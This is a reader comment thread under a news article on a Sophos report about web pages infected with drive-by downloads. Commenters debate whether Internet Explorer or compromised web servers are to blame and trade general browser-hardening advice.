back to article Drive-by download menace spreading fast

Booby-trapped web pages are growing at an alarming rate with unsuspecting firms acting for nurseries for botnet farmers, according to a new study. Security watchers at Sophos are discovering 6,000 new infected webpages every day, the equivalent of one every 14 seconds. Four in five (83 per cent) of these webpages actually …

COMMENTS

This topic is closed for new posts.
  1. Dave Bell
    Coat

    Internet Explorer? Again?

    With the politicians trying to criminalise "hacking tools", should Internet Explorer still be legal?

  2. Anonymous Coward
    Anonymous Coward

    Ahhh, you got the 2008 Security Report then?

    Interesting read, innit?

    :-)

  3. jrb
    Thumb Down

    too quick to blame IE?

    i think you're missing the point here if you're going to jump on the bandwagon, and try to blame internet explorer.

    How are these zombie sites getting infected. Sophos' research suggests a combination of javascript, and a web server exploit. Apache was named as a webserver that's been exploitable, although it seems it's not limited to just that..

    http://www.cpanel.net/security/notes/random_js_toolkit.html

  4. b shubin
    Pirate

    Target vuln

    @ jrb

    if your client doesn't have the IE iFrame vulnerability, or is not vulnerable to a JS exploit, or some ActiveX bug (there's one every couple of months, seems like), it matters not what the server is doing. if the client is not exploitable, it can't be exploited.

    how is this not obvious?

    bandwagon has nothing to do with it.

    why is it that someone always jumps up to defend IE? it's a commercial product, they have paid marketing drones to handle PR. more importantly, who benefits from such spirited (if not always coherent) defense? and if the party that benefits is Microsoft, one has to wonder whether at least some of the defenders are astroturfing.

  5. JC

    @ jrb

    No point missed jrb, it doesn't matter at all how the zombie sites are getting infected, NOT THE TINIEST LITTLE BIT when it comes to resolving the effect on the masses pseudo-innocently surfing the web.

    No matter what, a properly secured browser will not infect the host accessing a webserver. At worst a fault in the server side will just prevent the website from operating properly, which we can say is a fault in it's security but the drive by download menace is only a menace when the host browser allows it.

    Remember, when surfing the web you run software that downloads code. The code could be anything at all, and the software you are running has to deal with it. No amount of trying to prevent random code from flowing could ever work, it has to be the client side that limits what could happen.

  6. B Gracey

    Browser doesn't matter if...

    You're not smart enough to protect yourself.

    Saying that the problem lies with web servers and that the solution starts there is like saying there's a problem with theft in high density urban areas and the police should do more to protect the people at large.

    Just like you ought to lock your vehicle up to help protect yourself, you also ought to learn about how to block iFrames, VBScript, ActiveX and JavaScript - only allowing those things on a per-page or per-site basis as needed to get through your task.

    If you're just surfing, why would you want your browser wide open to all those attack vectors?

  7. Pascal Monett Silver badge

    Won't affect me

    As owner of a web site, I am glad to see that my complete lack of java, ActiveX modules and Apache anything in my site code preserves the security of all users who get to my pages - even if they are sufficiently misled to use a prime malware vector such as IE (any flavor).

    Heck, I don't even set cookies on my site ! It's pure HTML, all the way.

    Of course, I don't attempt to sell anything either, so it's easier to be clean.

    As for my own security, I am confident that my browser will not foist a download upon me without a warning, and that I can actually make an intelligent evaluation before clicking on something.

  8. Anonymous Coward
    Thumb Down

    @Pascal

    You don't put "Apache anything" in your site code (or 'markup' as it's known if it's "pure HTML") but then most people don't because Apache is a webserver and not a content enhancing browser extention like Java or ActiveX.

    Chances are that your website is hosted and served by an Apache webserver, it's by far the most common web server out there.

    If the web server that hosts your site is compromised there is little you can do to prevent your site being used to distribute malware even if you know what you are doing and especially if that server is owned and managed by someone else.

    Unless I missed the point somewhere then based on your post I wouldn't be too confident about being safe from malware if I were you.

  9. Graham Cluley
    Alert

    Apache web servers hosting malware

    Yes, Sophos's research found that 48.7% of the compromised websites were running Apache. The next closest was IIS 6 which was used on 40.6% of the websites hosting malicious code. There is a danger that people may think that just by avoiding Microsoft software they're immune from attack - which is clearly nonsense.

    Most of these webpages are poisoned with malicious Iframes and obfuscated Javascript pointing to Trojan horses capable of infecting Windows users. Sophos also saw some financially-motivated Mac malware being distributed via the web in the last few months too.

    The full report is available from http://www.sophos.com/securityreport2008 if anyone is interested. You have to fill in a form to get at the PDF with the meat of the report, but you can always say you're Donald Duck if you're paranoid we're going to do something ghastly with your details...

    Graham Cluley, Senior technology consultant, Sophos

  10. b shubin
    Boffin

    How goofy would that be?

    @ Graham Cluley

    what if one actually IS Donald Duck (and paranoid)? perception is reality, you know...

    any idea yet what the vector is? would having a squid proxy on, say, OpenBSD, in front of your Apache box help? what if it's configured with an ACL? SELinux? whitelist only? what if your site is strictly flat HTML, are you immune? is the Pope Catholic? ...just checking if you're paying attention.

    thanks for reading, and any answers you can provide.

This topic is closed for new posts.